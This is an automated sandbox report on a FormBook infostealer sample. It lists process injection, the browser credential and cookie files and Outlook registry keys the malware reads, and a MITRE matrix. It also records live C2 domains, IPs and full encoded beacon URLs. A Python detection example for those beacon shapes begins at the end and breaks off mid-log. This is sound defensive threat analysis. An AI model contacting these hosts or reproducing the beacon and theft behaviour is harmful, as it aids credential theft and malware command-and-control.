            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000F4A35
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00154EC9 mouse_event,0_2_00154EC9
            Source: C:\Users\user\Desktop\docs_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
            Source: C:\Windows\SysWOW64\isoburn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001481F7
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00154C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00154C03
            Source: docs_pdf.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: docs_pdf.exe, HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0011886B cpuid 0_2_0011886B
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001250D7
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00132230 GetUserNameW,0_2_00132230
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0012418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0012418A
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000F4AFE

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: docs_pdf.exe | Binary or memory string: WIN_81
            Source: docs_pdf.exe | Binary or memory string: WIN_XP
            Source: docs_pdf.exe | Binary or memory string: WIN_XPe
            Source: docs_pdf.exe | Binary or memory string: WIN_VISTA
            Source: docs_pdf.exe | Binary or memory string: WIN_7
            Source: docs_pdf.exe | Binary or memory string: WIN_8
            Source: docs_pdf.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00166596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00166596
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00166A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00166A5A
            MITRE ATT&CK Matrix (a number in parentheses is the count the report shows for that technique):

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Native API (2) | DLL Side-Loading (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (4) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
            Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | Valid Accounts (2) | Abuse Elevation Control Mechanism (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (21) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Valid Accounts (2) | Obfuscated Files or Information (3) | NTDS | System Information Discovery (116) | Distributed Component Object Model | Input Capture (21) | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Access Token Manipulation (21) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (151) | SSH | Clipboard Data (3) | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Process Injection (412) | Valid Accounts (2) | Cached Domain Credentials | Virtualization/Sandbox Evasion (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (2) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (412) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1472519, Sample: docs_pdf.exe, Startdate: 13/07/2024, Architecture: WINDOWS, Score: 100

            Start: DNS/IP: www.hectmalt.xyz; yexz60.live; 21 other IPs or domains. Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures. Performs DNS queries to domains with low reputation (www.hectmalt.xyz).
            docs_pdf.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces.
            svchost.exe (started by docs_pdf.exe): Maps a DLL or memory area into another process.
            HDtHilbfKZE.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR).
            isoburn.exe (started by HDtHilbfKZE.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
            HDtHilbfKZE.exe (injected by isoburn.exe) and firefox.exe (started by isoburn.exe).
            HDtHilbfKZE.exe (injected) network: www.gymroom.online 37.9.175.173, ports 49725, 49726, 49727, WEBSUPPORT-SRO-SK-ASSK Slovakia (SLOVAK Republic); www.hectmalt.xyz 203.161.41.207, ports 49729, 49732, 49733, VNPT-AS-VNVNPTCorpVN Malaysia; 8 other IPs or domains. Found direct / indirect Syscall (likely to bypass EDR).

            Source | Detection | Scanner | Label | Link
            docs_pdf.exe | 66% | ReversingLabs | Win32.Backdoor.FormBook |
            docs_pdf.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.atlpicsstudios.com/8td2/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.quixaclienti.com/ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.bearclaw.bot/euu6/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.shaf-kupe-msk.store/8rqd/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.atlpicsstudios.com/8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.hectmalt.xyz/9ntw/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.gymroom.online/9v4b/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sodnavisystem.com/5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.mcpcrecycling.com/22y6/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.bearclaw.bot/euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxxtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.quixaclienti.com/ch4t/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.789bet1okvip.solutions/aoam/true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sgbet777.org/aiec/false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.noghteyab.com/wlsq/true
                                                          • Avira URL Cloud: safe
                                                          unknown
Name | Source | Malicious | Antivirus Detection | Reputation
---- | ------ | --------- | ------------------- | ----------
https://duckduckgo.com/chrome_newtab | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://411divorce.com/6rlx/?D0Pts04=Q2ZAF | isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P | isoburn.exe, 00000005.00000002.4553311671.0000000005ED4000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003E54000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/recaptcha/api.js?hl=en | isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://help.yahoo.com/help/us/ysearch/slurp) | firefox.exe, 0000000A.00000002.2775625932.0000020038AA0000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://301mei.xyz:7788/?u= | isoburn.exe, 00000005.00000002.4555303639.00000000075E0000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.000000000651C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000449C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sgbet777.org | HDtHilbfKZE.exe, 00000007.00000002.4553969990.00000000052B3000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wordpress.org/extend/plugins/nginx-helper/faq/ | isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
-- | ------ | ------- | --- | -------- | ---------
5.78.41.174 | 411divorce.com | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | true
51.89.93.192 | www.noghteyab.com | France | 16276 | OVHFR | true
162.43.105.95 | www.sodnavisystem.com | United States | 11333 | CYBERTRAILSUS | true
188.114.96.3 | www.evoolihubs.shop | European Union | 13335 | CLOUDFLARENETUS | true
37.9.175.173 | www.gymroom.online | Slovakia (SLOVAK Republic) | 51013 | WEBSUPPORT-SRO-SK-ASSK | true
203.161.41.207 | www.hectmalt.xyz | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
45.130.41.38 | www.shaf-kupe-msk.store | Russian Federation | 198610 | BEGET-ASRU | true
3.33.130.190 | bearclaw.bot | United States | 8987 | AMAZONEXPANSIONGB | true
64.46.102.70 | sgbet777.org | United States | 26163 | DATAGRAMUS | false
103.176.91.154 | www.334es.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1472519
Start date and time: 2024-07-13 00:01:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: docs_pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@16/10
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 96%
                                                          • Number of executed functions: 58
                                                          • Number of non-executed functions: 273
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target HDtHilbfKZE.exe, PID 4544 because it is empty
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: docs_pdf.exe
Time | Type | Description
---- | ---- | -----------
18:03:11 | API Interceptor | 12997360x Sleep call for process: isoburn.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
----- | ---------------------------- | --------- | ----------- | -------
5.78.41.174 | SHIPPING DOCS_pdf.exe | malicious | FormBook | www.411divorce.com/6rlx/?mv0D=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&Jj=kpS8
5.78.41.174 | purchase order_pdf.exe | malicious | FormBook | www.411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0
51.89.93.192 | Document.exe | malicious | FormBook | www.noghteyab.com/f97t/
162.43.105.95 | SHIPPING DOCS_pdf.exe | malicious | FormBook | www.sodnavisystem.com/5mht/?mv0D=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&Jj=kpS8
188.114.96.3 | http://38738d.s3-website.eu-north-1.amazonaws.com/2955133/995291385/c2FtdWVsLmJvZ2VyQGdmLmNvbQ== | malicious | Unknown | bharatlokmatnews.com/favicon.ico
188.114.96.3 | INVOICE PAYMENT_Scan0016PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/uIv3IIBw/download
188.114.96.3 | payment advice.exe | malicious | FormBook | www.coinwab.com/efdt/
188.114.96.3 | MV ENISHI V.53Y.xls | malicious | Unknown | come.ac/70DgR
188.114.96.3 | PO63972.xls | malicious | Unknown | come.ac/ZfN-c
188.114.96.3 | Purchase Order -JJ023639#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/mxhZOu4r/download
188.114.96.3 | QUOTATION_JUNQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/zyfg52lT/download
188.114.96.3 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/EQ4IeQyC/download
188.114.96.3 | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/ygwPva9v/download
188.114.96.3 | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/uIFkI2gU/download
37.9.175.173 | SHIPPING DOCS_pdf.exe | malicious | FormBook | www.gymroom.online/9v4b/?mv0D=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&Jj=kpS8
37.9.175.173 | purchase order_pdf.exe | malicious | FormBook | www.gymroom.online/9v4b/?MdEl=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&cv4D=Bv0xSH88iTF48zS0
37.9.175.173 | arrival notice_pdf.exe | malicious | FormBook | www.gymroom.online/9v4b/?CbPtaF=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&NV=CzkTp6UpmNmd
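The URL tables above and the related-sample table just listed share one structural pattern: a single four-character path under the web root (/6rlx/, /9v4b/, /fwdd/), one query parameter carrying a long base64-looking blob, and a second short parameter. The related samples also show that the parameter names change from build to build (D0Pts04, mv0D, MdEl, CbPtaF) while the path and blob stay the same, and the URL tables show every one of these hosts rated "safe" by Avira URL Cloud even though the sandbox marks them malicious. A detection that keys on URL shape rather than on names or reputation therefore catches what the feed missed. The following is an added example written for this page, not code from the report or from Joe Sandbox: it runs that structural check over a constructed proxy log. The log format, client addresses, timestamps, request methods and status codes are made up; the URLs are copied from or modelled on the tables above; the blob is treated as opaque and nothing here decodes FormBook's own encoding.

```python
"""Structural detection of FormBook-style C2 beacons in proxy log lines.

Added example, not part of the Joe Sandbox report. Log format and client
addresses are constructed; URL shapes follow the report's URL tables.
"""
import base64
import re
from urllib.parse import urlsplit

# Constructed proxy log (timestamp client method url status). The three
# FormBook-style URLs and the recaptcha URL are taken from the report's URL
# tables; the duckduckgo line is modelled on one; the example.org decoy is
# made up to show a near-miss. Methods and status codes are assumptions.
SAMPLE_LOG = """\
2024-07-13T00:05:11Z 10.0.0.15 GET http://www.411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx 200
2024-07-13T00:05:12Z 10.0.0.15 GET https://duckduckgo.com/ac/?q=isoburn 200
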